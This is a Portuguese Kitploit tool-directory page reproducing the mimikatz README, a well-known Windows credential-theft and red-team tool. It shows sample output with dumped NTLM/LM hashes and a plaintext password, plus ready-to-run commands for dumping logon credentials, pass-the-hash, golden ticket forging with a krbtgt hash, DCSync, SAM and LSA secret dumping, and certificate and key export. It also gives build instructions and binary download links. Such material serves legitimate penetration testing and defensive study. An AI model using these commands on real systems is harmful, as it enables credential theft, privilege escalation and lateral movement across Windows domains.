Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
mimikatz — Ferramenta para extrair credenciais do Windows (senhas, hashes, tickets Kerberos) da memória e executar ataques pass-the-hash, pass-the-ticket e golden ticket. | Kitploit
Ferramentas/GitHubGitHub/parrotsec/mimikatz
Escalada de PrivilégiosForensia de MemóriaAtaques de SenhaExploraçãoMovimento LateralTestes de PenetraçãoAutenticaçãoRed Teaming
GitHubparrotsec/mimikatz

mimikatz

Ferramenta para extrair credenciais do Windows (senhas, hashes, tickets Kerberos) da memória e executar ataques pass-the-hash, pass-the-ticket e golden ticket.

Ver Repositório
2.6k356há 2 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

mimikatz

mimikatz é uma ferramenta que criei para aprender C e fazer algumas experiências com a segurança do Windows.

Agora é bem conhecida por extrair senhas em texto puro, hashes, código PIN e tickets Kerberos da memória. mimikatz também pode realizar pass-the-hash, pass-the-ticket ou construir Golden tickets.

root@kitploit:~
  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr  6 2014 22:02:03)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                    with  13 modules * * */


mimikatz # privilege::debug
Privilege '20' OK
 
mimikatz # sekurlsa::logonpasswords
 
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
...

Mas isso não é tudo! Crypto, Terminal Server, Events, ... muitas informações no GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki ou em http://blog.gentilkiwi.com (em francês, sim).

Se você não quiser compilar, os binários estão disponíveis em https://github.com/gentilkiwi/mimikatz/releases

Uso rápido

root@kitploit:~
log
privilege::debug

sekurlsa

root@kitploit:~
sekurlsa::logonpasswords
sekurlsa::tickets /export

sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

kerberos

root@kitploit:~
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi

kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

crypto

root@kitploit:~
crypto::capi
crypto::cng

crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

crypto::keys /export
crypto::keys /machine /export

vault e lsadump

root@kitploit:~
vault::cred
vault::list

token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert

lsadump::dcsync /user:domain\krbtgt /domain:lab.local

Compilar

mimikatz está na forma de uma Solução do Visual Studio e um driver WinDDK (opcional para as operações principais), então os pré-requisitos são:

  • para mimikatz e mimilib : Visual Studio 2010, 2012 ou 2013 para Desktop (2013 Express for Desktop é gratuito e suporta x86 & x64 - http://www.microsoft.com/download/details.aspx?id=44914)
  • para o mimikatz driver, mimilove (e plataforma ddk2003) : Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800

mimikatz usa SVN para controle de versão, mas agora também está disponível com GIT! Você pode usar qualquer ferramenta para sincronizar, até mesmo o GIT incorporado no Visual Studio 2013 =)

Sincronizar!

  • URL do GIT é : https://github.com/gentilkiwi/mimikatz.git
  • URL do SVN é : https://github.com/gentilkiwi/mimikatz/trunk
  • Arquivo ZIP é : https://github.com/gentilkiwi/mimikatz/archive/master.zip

Compilar a solução

  • Após abrir a solução, Build / Build Solution (você pode mudar a arquitetura)
  • mimikatz agora está compilado e pronto para uso! (Win32 / x64 até ARM64 se você tiver sorte)
    • você pode ter o erro MSB3073 sobre _build_.cmd e mimidrv, isso acontece porque o driver não pode ser compilado sem o Windows Driver Kit 7.1 (WinDDK), mas mimikatz e mimilib estão OK.

ddk2003

Com esta plataforma MSBuild opcional, você pode usar as ferramentas de compilação do WinDDK e o runtime padrão msvcrt (binários menores, sem dependências)

Para esta plataforma opcional, o Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 e o Visual Studio 2010 são obrigatórios, mesmo se você planeja usar Visual Studio 2012 ou 2013 depois.

Siga as instruções:

  • http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme
  • http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader

Licença

Licença CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/

mimikatz precisa de café para ser desenvolvido:

  • PayPal: https://www.paypal.me/delpy/

Autor

  • Benjamin DELPY gentilkiwi, você pode me contatar no Twitter ( @gentilkiwi ) ou por e-mail ( benjamin [at] gentilkiwi.com )
  • As funções DCSync e DCShadow no módulo lsadump foram co-escritas com Vincent LE TOUX, você pode contatá-lo por e-mail ( vincent.letoux [at] gmail.com ) ou visitar o site dele ( http://www.mysmartlogon.com )

Este é um desenvolvimento pessoal, por favor respeite sua filosofia e não o use para coisas ruins!

Baixar ferramenta